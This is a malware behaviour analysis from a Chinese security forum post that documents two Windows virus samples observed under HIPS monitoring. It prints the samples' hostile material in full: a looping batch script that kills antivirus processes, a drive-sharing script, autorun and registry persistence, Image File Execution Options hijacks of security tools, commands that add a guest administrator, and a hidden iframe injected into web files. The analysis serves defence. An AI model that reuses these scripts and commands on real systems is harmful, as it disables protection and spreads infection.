瑞星卡卡安全论坛

首页 » 综合娱乐区 » 活动专区 » 历史活动 » 论坛9周年活动专区 » [Simple Lions]第四关闯关
mopery - 2010-3-28 15:46:00
测试环境: microsoft windows xp professional
HIPS软件: SSM-2.4.0.622
                TinyFirewall-v6.5.120
规则包: 无  全默认情况下监控


病毒样本1

文件变化:
释放文件
C:\WINDOWS\system.ini
C:\WINDOWS\system32\AUTORUN.INF
C:\WINDOWS\system32\Avpser.cmd
C:\WINDOWS\system32\netshare.cmd
C:\WINDOWS\system32\SDGames.exe
C:\WINDOWS\system32\Taskeep.vbs

system.ini (系统文件,病毒修改)内容:
; for 16-bit app support

[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=app936.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[windows]
shell=explorer.exe & C:\WINDOWS\system32\SDGames.exe
load=C:\WINDOWS\system32\SDGames.exe

[Autorun]
OPEN=SDGames.exe
Shell\Open=打开(^&O)
Shell\Open\Command=SDGames.exe
Shell\Explore=资源管理器(^&X)
Shell\Explore\Command=SDGames.exe

netshare.cmd 内容:
net share A=A:
net share B=B:
net share C=C:
net share D=D:
net share E=E:
net share F=F:
net share G=G:
net share H=H:
net share I=I:
net share J=J:
net share K=K:
net share L=L:
net share M=M:
net share N=N:
net share O=O:
net share P=P:
net share Q=Q:
net share R=R:
net share S=S:
net share T=T:
net share U=U:
net share V=V:
net share W=W:
net share X=X:
net share Y=Y:
net share Z=Z:

此命令开启系统各个盘符共享


avpser.cmd 内容:
@echo off
:k
Set p=taskkill /f /im /t
sc config winmgmt start= AUTO & net start winmgmt
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% SmartUp*
%p% FileDsty*
%p% RegClean*
%p% 360tray*
%p% 360safe*
%p% kabaload*
%p% safelive*
%p% KASTask*
%p% kpFW32*
%p% kpFW32X*
%p% KvXP_1*
%p% KVMonXP_1*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% KvNative*
%p% Virus*
%p% Filewall*
%p% Kaspersky*
%p% JiangMin*
%p% RavMonD*
%p% RavStub*
%p% RavTask*
%p% adam*
%p% cSet*
%p% PFWliveUpdate*
%p% mmqczj*
%p% Trojanwall*
%p% Ras.exe
%p% runiep.exe
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木马*
%p% 社区*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% BLACKICE*
%p% 360safe.exe
%p% Shadowservice.exe
%p% v3webnt.exe
%p% v3sd32.exe
%p% v3monsvc.exe
%p% sysmonnt.exe
%p% hkcmd.exe
%p% DNTUS26.EXE
%p% AhnSD.exe
%p% CTFMON.EXE
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修复*
%p% 保护*
goto k

taskeep.vbs 内容:
taskeep.vbs
on error resume next
set Ws = CreateObject("wscript.Shell")
count=0
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.name="wscript.exe"then count=count+1
next
if count > 2 then wscript.quit
i=1
for i = 1 to 3
i=i-1
WScript.Sleep(2000)
strProcess = "1.exe"
Proce = false
For each x in getobject("winmgmts:").instancesof("win32_process")
If ucase(x.name) = ucase(strProcess) then
Proce = true
Exit For
End If
Next
If Proce=false then
Ws.run "原始病毒运行的路径"
WScript.Quit
else
WScript.Quit
End If
next


各分区根目录释放(A-Z盘符)
X:\Recycleds.url
X:\Windows.url
X:\新建文件夹.url
X:\AUTORUN.INF

.url 指向该分区下的SDGames.exe
[url=file:///X:/SDGames.exe]file:///X:/SDGames.exe[/url]

AUTORUN.INF 内容:
[Autorun]
OPEN=SDGames.exe
Shell\Open=打开(^&O)
Shell\Open\Command=SDGames.exe
Shell\Explore=资源管理器(^&X)
Shell\Explore\Command=SDGames.exe

注册表变动:
创建启动项
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"run"="C:\WINDOWS\system32\SDGames.exe"
"load"="C:\WINDOWS\system32\SDGames.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Winstary"="C:\\WINDOWS\\system32\\SDGames.exe"

劫持 reg 和 txtfile 关联
[HKEY_CLASSES_ROOT\regfile\shell\open\command\]
@="C:\\WINDOWS\\system32\\SDGames.exe"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command\]
@="C:\\WINDOWS\\system32\\SDGames.exe"

写入注册表项禁用CMD
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=REG_DWORD:00000000

[HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System\DisableCMD]
"DisableCMD"=REG_DWORD:00000000

修改注册表注册表项禁用"显示文件和文件夹"和"显示文件扩展名"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden]
"HidefileExt"=REG_DWORD:00000001
"ShowSuperHidden"=REG_DWORD:00000001
"SuperHidden"=REG_DWORD:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000

修改注册表禁用"文件夹选项" "控制面板" 和 "设置任务栏"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001
"NoControlPanel"=dword:00000001
"NoSetTaskbar"=dword:00000001

修改注册表禁用"注册表功能"和"任务管理器"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistrytools"=dword:00000001
"DisableTaskMgr"=dword:00000001

修改注册表禁用"网络防火墙"
[HKLM\SYSTEM\CurrentControlSet\Services\ALG]
"Start"=REG_DWORD:00000004

修改注册表禁用"远程桌面服务"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

修改注册表禁用/开启"高速缓存"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"=dword:00000000

修改注册表取消"关闭系统"按钮
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShutdownWithoutLogon]
"ShutdownWithoutLogon"=dword:00000000

修改注册表禁用"热键"
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"=dword:00000001

修改注册表"实现文件共享"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareWks"=dword:00000001
"AutoShareServer"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Start ]
"Start"=dword:00000004

修改注册表更改"默认IE主页"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page]
"Start Page"="http://www.zhidaobaidu.10mb.cn/"
"Default_Page_URL"="wangma"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page]
"Start Page"="wangma"
"Default_Page_URL"="wangma"

修改注册表破坏"安全模式"
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]

创建 Image File Execution Options 劫持安全相关程序
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
"Debugger"="360rpt.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="360Safe.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.EXE]
"Debugger"="360tray.EXE"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe]
"Debugger"="adam.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe]
"Debugger"="AgentSvr.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe]
"Debugger"="AppSvc32.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]
"Debugger"="autoruns.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe]
"Debugger"="avgrssvc.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe]
"Debugger"="AvMonitor.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com]
"Debugger"="avp.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]
"Debugger"="avp.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe]
"Debugger"="CCenter.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe]
"Debugger"="ccSvcHst.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe]
"Debugger"="FileDsty.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe]
"Debugger"="FTCleanerShell.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"Debugger"="HijackThis.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe]
"Debugger"="IceSword.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe]
"Debugger"="iparmo.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe]
"Debugger"="Iparmor.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe]
"Debugger"="isPwdSvc.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe]
"Debugger"="kabaload.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR]
"Debugger"="KaScrScn.SCR"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe]
"Debugger"="KASMain.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe]
"Debugger"="KASTask.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe]
"Debugger"="KAV32.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe]
"Debugger"="KAVDX.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe]
"Debugger"="KAVPFW.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe]
"Debugger"="KAVSetup.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe]
"Debugger"="KAVStart.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe]
"Debugger"="KISLnchr.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe]
"Debugger"="KMailMon.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe]
"Debugger"="KMFilter.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Knod32kui.exe]
"Debugger"="nod32kui.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe]
"Debugger"="KPFW32.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe]
"Debugger"="KPFW32X.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe]
"Debugger"="KPFWSvc.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe]
"Debugger"="KRegEx.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRepair.COM]
"Debugger"="KRepair.COM"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe]
"Debugger"="KsLoader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp]
"Debugger"="KVCenter.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe]
"Debugger"="KvDetect.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe]
"Debugger"="KvfwMcl.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp]
"Debugger"="KVMonXP.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp]
"Debugger"="KVMonXP_1.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe]
"Debugger"="kvol.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe]
"Debugger"="kvolself.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp]
"Debugger"="KvReport.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp]
"Debugger"="KVScan.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe]
"Debugger"="KVSrvXP.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp]
"Debugger"="KVStub.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe]
"Debugger"="kvupload.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe]
"Debugger"="kvwsc.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp]
"Debugger"="KvXP.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp]
"Debugger"="KvXP_1.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe]
"Debugger"="KWatch.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe]
"Debugger"="KWatch9x.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe]
"Debugger"="KWatchX.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe]
"Debugger"="loaddll.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe]
"Debugger"="MagicSet.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MainCon.exe]
"Debugger"="MainCon.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe]
"Debugger"="mcconsol.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe]
"Debugger"="mmqczj.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe]
"Debugger"="mmsk.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
"Debugger"="msconfig.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe]
"Debugger"="NAVSetup.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe]
"Debugger"="nod32krn.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe]
"Debugger"="PFW.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe]
"Debugger"="PFWLiveUpdate.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe]
"Debugger"="QHSET.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe]
"Debugger"="QQ.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]
"Debugger"="Ras.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe]
"Debugger"="Rav.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe]
"Debugger"="RavMon.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe]
"Debugger"="RavMonD.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe]
"Debugger"="RavStub.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe]
"Debugger"="RavTask.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe]
"Debugger"="RegClean.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe]
"Debugger"="rfwcfg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe]
"Debugger"="RfwMain.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe]
"Debugger"="rfwProxy.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe]
"Debugger"="rfwsrv.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe]
"Debugger"="Rsaupd.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe]
"Debugger"="runiep.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe]
"Debugger"="safelive.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe]
"Debugger"="scan32.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Shadowservice.exe]
"Debugger"="Shadowservice.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe]
"Debugger"="shcfg32.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe]
"Debugger"="SmartUp.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe]
"Debugger"="SREng.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\srgui.exe]
"Debugger"="srgui.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe]
"Debugger"="symlcsvc.exe"


用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
mopery - 2010-3-28 15:48:00
接上面

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe]
"Debugger"="SysSafe.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe]
"Debugger"="TrojanDetector.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe]
"Debugger"="Trojanwall.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp]
"Debugger"="TrojDie.kxp"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe]
"Debugger"="UIHost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe]
"Debugger"="UmxAgent.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe]
"Debugger"="UmxAttachment.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe]
"Debugger"="UmxCfg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe]
"Debugger"="UmxFwHlp.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe]
"Debugger"="UmxPol.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe]
"Debugger"="UpLive.EXE.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe]
"Debugger"="WoptiClean.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe]
"Debugger"="zxsweep.exe"

其他行为:
调用 "cmd" "net" "net1" 和 "WScript" 运行以下命令
  命令行:explorer.exe C:\Documents and Settings\用户名\桌面
  命令行:cmd /c sc config winmgmt start= AUTO & net start winmgmt & quit
  命令行:cmd /c sc config lanmanserver start= AUTO & net start lanmanserver & quit
  命令行:sc config winmgmt start= AUTO
  命令行:net start winmgmt
  命令行:cmd /c sc config Alg Start= disabled & net stop Alg
  命令行:sc config lanmanserver start= AUTO
  命令行:cmd /c sc config sharedaccess Start= disabled & net stop sharedaccess
  命令行:sc config Alg Start= disabled
  命令行:sc config sharedaccess Start= disabled
  命令行:net user guest /add
  命令行:net user guest /active
  命令行:net user guest "
  命令行:net localgroup Administrators guest
  命令行:net localgroup Guests guest /add
  命令行:Rundll32.exe url.dll, FileProtocolHandler C:\WINDOWS\system32\Taskeep.vbs
  命令行:"C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\Taskeep.vbs"
  命令行:cmd /c C:\WINDOWS\system32\Avpser.cmd

不间断的运行 avpser.cmd , 关闭安全软件进程

不间断的运行以下命令 保护 X:\AUTORUN.INF
  命令行:cmd /c rd /s /q X:\AUTORUN.INF

系统时间的年份被更改为2030年

%WINDOWS%\system32  被更改为隐藏文件

搜索感染除系统盘以外的所有 .exe/.jsp/.asp/.php/.htm/.html/.hta文件

感染的 .jsp/.asp/.php/.htm/.html/.hta 网页类文件,添加以下内容
<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe" align="center" border="0">
mopery - 2010-3-28 15:49:00
病毒样本2

文件变化:
释放文件
C:\WINDOWS\Fonts\a513586c6c6c87f70ab58bf916612642\system\svchost.exe

注册表变动:
创建启动项
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TBMExe"="C:\\WINDOWS\\Fonts\\a513586c6c6c87f70ab58bf916612642\\system\\svchost.exe"

创建 Image File Execution Options 劫持安全相关程序
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\APVXDWIN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.EXE]
"Debugger"="c:\\\\xue.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVNT.EXE]
"Debugger"="c:\\\\xue.exe"
